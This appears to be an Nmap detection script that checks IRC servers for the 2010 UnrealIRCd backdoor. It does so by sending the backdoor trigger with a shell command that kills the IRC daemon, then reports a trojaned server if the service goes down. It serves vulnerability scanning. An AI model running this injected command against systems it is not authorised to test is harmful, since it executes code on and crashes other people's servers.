description = [[
Checks if an IRC server is backdoored:

Reference:
http://seclists.org/fulldisclosure/2010/Jun/277
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
]]

---
-- @output
-- PORT     STATE SERVICE
-- 6667/tcp open  irc
-- |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. IRC server is now DOWN. See http://seclists.org/fulldisclosure/2010/Jun/277
-- 

author = "Vlatko Kosturjak"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}

require "shortport"
require "comm"
require "stdnse"

portrule = shortport.port_or_service({6666,6667,6697,6679,8067},{"irc","ircs"})

action = function(host, port)
	local socket = nmap.new_socket()
	local code, message
	local err_catch = function()
		socket:close()
	end

	local opts = {timeout=10000, recv_before=false}
	local socket, response = comm.tryssl(host, port, "AB;kill `ps -e | grep ircd | awk '{ print $1 }'`\n", opts)
	if not socket then 
		stdnse.print_debug(1, "cannot connect to port which was open in port scan?")
		return 
	else
		stdnse.print_debug(2, "vulnerability trigger sent successfully.")

	end
	socket:close()

	-- sleep before connecting again
	stdnse.sleep(1)
	local csocket, cresponse = comm.tryssl(host, port, "AB;kill `ps -e | grep ircd | awk '{ print $1 }'`\n", opts)
	if not csocket then
		stdnse.print_debug(1, "IRC server looks down. Probably trojaned version of unrealircd")
		return "Looks like trojaned version of unrealircd. IRC server is now DOWN. See http://seclists.org/fulldisclosure/2010/Jun/277"
	else
		stdnse.print_debug(1, "IRC server not trojaned")
		csocket:close()
	end
end